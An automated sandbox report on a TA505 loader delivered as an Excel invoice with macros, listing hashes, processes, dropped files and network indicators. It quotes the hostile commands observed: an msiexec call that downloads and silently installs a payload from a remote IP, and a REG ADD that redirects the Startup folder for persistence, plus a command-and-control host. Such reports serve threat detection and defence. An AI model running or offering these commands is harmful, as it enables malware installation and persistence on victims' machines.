analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

1C3F5C8E_Factura_FMC5771_20190424.xls

Full analysis: https://app.any.run/tasks/fe6c1907-86af-4806-8b67-4665000dbed0
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 25, 2019, 15:05:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
exe-to-msi
loader
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Wed Apr 24 15:32:18 2019, Security: 0
MD5:

F04ECA1CF8A93F8CA7FFF0E976036E02

SHA1:

3FD6114E6D5A6792CC5E8EB587DBD5E106A5B60A

SHA256:

559210D28DCBFF8517F3BDDDC8E298D188D543785ADC9FDF96CED005A29B72BA

SSDEEP:

1536:hKpb8rGYrMPelwhKmFV5xtezEsgrdg7pUQjSKhLfo0/Jt4jeJ32RLEQfz1Wr:hKpb8rGYrMPelwhKmFV5xtezEsgrdg7N

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2516)
    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 2516)
    • Changes the Startup folder

      • REG.exe (PID: 932)
    • Application was dropped or rewritten from another process

      • cmualrc.exe (PID: 2056)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3864)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3864)
  • SUSPICIOUS

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3864)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3864)
      • MSI6DBC.tmp (PID: 1692)
    • Creates files in the program directory

      • MSI6DBC.tmp (PID: 1692)
    • Uses REG.EXE to modify Windows registry

      • cmualrc.exe (PID: 2056)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2516)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3864)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3864)
    • Application was dropped or rewritten from another process

      • MSI6DBC.tmp (PID: 1692)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Microsoft Office
LastModifiedBy: 1
Software: Microsoft Excel
CreateDate: 2018:12:19 10:42:12
ModifyDate: 2019:04:24 14:32:18
Security: None
CodePage: Windows Cyrillic
Company: Microsoft Corporation
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • 4
  • OOOO
  • 2
  • 3
HeadingPairs:
  • Листы
  • 2
  • Макросы Excel 4.0
  • 2
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi6dbc.tmp cmualrc.exe reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
2516"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
1016msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3864C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1692"C:\Windows\Installer\MSI6DBC.tmp"C:\Windows\Installer\MSI6DBC.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2056c:\programdata\f64a428dfd\cmualrc.exec:\programdata\f64a428dfd\cmualrc.exe
MSI6DBC.tmp
User:
admin
Integrity Level:
MEDIUM
932REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\f64a428dfdC:\Windows\system32\REG.exe
cmualrc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
713
Read events
649
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
1
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
2516EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR5C73.tmp.cvr
MD5:
SHA256:
3864msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF8BE7C2C3811EBB53.TMP
MD5:
SHA256:
3864msiexec.exeC:\Windows\Installer\MSI6C24.tmp
MD5:
SHA256:
3864msiexec.exeC:\Windows\Installer\MSI6DBC.tmp
MD5:
SHA256:
1692MSI6DBC.tmpC:\ProgramData\0
MD5:
SHA256:
1692MSI6DBC.tmpC:\programdata\f64a428dfd\cmualrc.exe:Zone.Identifier
MD5:
SHA256:
3864msiexec.exeC:\Config.Msi\e6b5a.rbs
MD5:
SHA256:
3864msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFB313B53E98D7A72F.TMP
MD5:
SHA256:
2056cmualrc.exeC:\ProgramData\0
MD5:
SHA256:
3864msiexec.exeC:\Windows\Installer\e6b59.ipibinary
MD5:5FC609C92ED38A9E2F887BF9B6314615
SHA256:290FFF719E81273A34AA15E6167A7523BE93AE3C87AC975E05565DAF133DD606
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3864
msiexec.exe
GET
200
109.234.38.177:80
http://109.234.38.177/dom4
RU
executable
172 Kb
suspicious
2056
cmualrc.exe
POST
87.126.16.141:80
http://gohaiendo.com/ppk/index.php
BG
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2056
cmualrc.exe
87.126.16.141:80
gohaiendo.com
Vivacom
BG
unknown
3864
msiexec.exe
109.234.38.177:80
Webzilla B.V.
RU
suspicious

DNS requests

Domain
IP
Reputation
gohaiendo.com
  • 87.126.16.141
  • 79.100.159.26
  • 46.47.98.128
  • 86.106.200.105
  • 151.251.23.210
  • 181.59.254.21
  • 203.91.116.53
  • 89.215.156.222
  • 89.190.74.198
  • 181.39.233.180
malicious

Threats

PID
Process
Class
Message
3864
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3864
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
1 ETPRO signatures available at the full report
No debug info